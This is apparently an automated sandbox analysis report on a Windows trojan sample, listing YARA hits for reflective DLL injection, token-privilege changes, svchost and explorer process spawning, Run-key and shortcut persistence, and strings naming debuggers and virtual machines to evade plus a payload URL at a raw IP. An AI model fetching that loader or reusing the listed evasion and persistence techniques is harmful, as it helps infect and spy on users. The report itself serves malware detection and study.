Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: String function: 00007FF632DA2760 appears 36 times

PE file does not import any functions

Source: api-ms-win-core-heap-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.8.dr	Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: fNzx1wx8tL.exe	Binary or memory string: OriginalFilename vs fNzx1wx8tL.exe
Source: fNzx1wx8tL.exe, 00000000.00000002.1712554060.00007FF6E1744000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSystem.exe6 vs fNzx1wx8tL.exe
Source: fNzx1wx8tL.exe, 00000000.00000003.1709507366.0000015F8012E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.exe6 vs fNzx1wx8tL.exe
Source: fNzx1wx8tL.exe	Binary or memory string: OriginalFilenameSystem.exe6 vs fNzx1wx8tL.exe

Yara signature match

Source: 2.0.explorer.exe.7da0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.0.explorer.exe.7da0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.9cb0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.c350000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.7da0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.fc00000.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.9cb0000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.7da0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.fc00000.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.c350000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000002.00000002.2976185947.0000000009CB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000002.00000002.2971350859.0000000007DA0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000002.00000002.2979697465.000000000C350000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000002.00000002.2983380179.000000000FC00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000002.00000000.1739477441.0000000007DA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@19/61@0/1

Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe

Code function: 8_2_00007FF632DA29E0 GetLastError,FormatMessageW,MessageBoxW,

8_2_00007FF632DA29E0

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1704F24 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle,	0_2_00007FF6E1704F24
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E17034B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	0_2_00007FF6E17034B0
Source: C:\Windows\explorer.exe	Code function: 2_2_09CBC9C4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	2_2_09CBC9C4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB4F24 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle,	3_2_00007FF699AB4F24
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	3_2_00007FF699AB34B0
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7536F34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	4_2_00007FF7536F34B0
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7536F4F24 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle,	4_2_00007FF7536F4F24
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B54F24 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle,	7_2_00007FF736B54F24
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B534B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	7_2_00007FF736B534B0
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E74F24 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle,	13_2_00007FF7F4E74F24
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E734B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	13_2_00007FF7F4E734B0

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Code function: 0_2_00007FF6E1705718 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00007FF6E1705718

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Code function: 0_2_00007FF6E170529C CoInitializeEx,SHGetFolderPathW,CoCreateInstance,CoUninitialize,

0_2_00007FF6E170529C

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

File created: C:\Users\user\AppData\Roaming\8711E746C94A2518020777

Source: C:\Windows\System32\svchost.exe

Mutant created: \Sessions\1\BaseNamedObjects\ZBI

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

File created: C:\Users\user\AppData\Local\Temp\TH5EE3.tmp

Source: fNzx1wx8tL.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: fNzx1wx8tL.exe

ReversingLabs: Detection: 69%

Source: fNzx1wx8tL.exe	String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: 8711E746C94A2518020777.exe	String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: svchost.exe	String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: svchost.exe	String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: svchost.exe	String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: fNzx1wx8tL.exe	String found in binary or memory: wcscpymsvcrt.dllwcscatwcscmpwcsncpywcslenstrlenreallocfreewcsstrCloseHandlekernel32.dllCreateFileWFreeLibraryMoveFileWGetFileSizeExGetWindowsDirectoryAGetVolumeInformationAGetTickCountwsprintfWuser32.dllwsprintfAVirtualAllocReadFileSleepVirtualFreeSetFilePointerCreateDirectoryWFindFirstFileWFindNextFileWFindCloseCopyFileWWriteFileGetSystemDirectoryWExitProcessCreateProcessWShellExecuteWshell32.dllGetModuleFileNameWGetShortPathNameWGetEnvironmentVariableWInternetOpenWwininet.dllInternetOpenUrlWHttpQueryInfoAInternetReadFileInternetConnectWHttpOpenRequestWHttpSendRequestAInternetCloseHandleSHGetFolderPathWSHGetFolderPathASHGetKnownFolderPathPathIsURLWshlwapi.dllPathCombineWPathFindFileNameWRegDeleteKeyWAdvapi32.dllRegOpenKeyExARegSetValueExARegCloseKeyOpenProcessTokenGetTokenInformationAdjustTokenPrivilegesGetUserNameWLookupPrivilegeValueACoUninitializeole32.dllCoCreateInstanceCoInitializeMessageBoxAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3SeDebugPrivilegeReflectiveLoaderSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\RunSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolderProcessHacker.exeprocexp.exeprocexp64.exeTOTALCMD.exex64dbg.exehttp://176.111.174.140/api/loader.binvmware.exevmware-vmx.exevboxservice.exevboxtray.exesvchost.exeChromebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set%SystemRoot%\system32\svchost.exe%08lX%04lX%luZBI\.exe.lnk\Software\Microsoft\Windows\CurrentVersion\RunSoftware\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHiddenServicesUnknown.firefox.exeexplorer.exe\MRT.exe\Mozilla\Firefox\Profiles\*release

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

File read: C:\Users\user\Desktop\fNzx1wx8tL.exe

Source: unknown	Process created: C:\Users\user\Desktop\fNzx1wx8tL.exe "C:\Users\user\Desktop\fNzx1wx8tL.exe"
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe "C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe"
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe "C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe"
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe"
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Process created: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe "C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe"
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe "C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe "C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe "C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Process created: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM	Jump to behavior

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Section loaded: libffi-7.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wininet.dll

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32

Binary contains a suspicious time stamp

Source: Chrome.lnk.0.dr

LNK file: ..\..\..\..\..\8711E746C94A2518020777\8711E746C94A2518020777.exe

Source: fNzx1wx8tL.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: fNzx1wx8tL.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1907622064.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1908284382.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.8.dr
Source:	Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
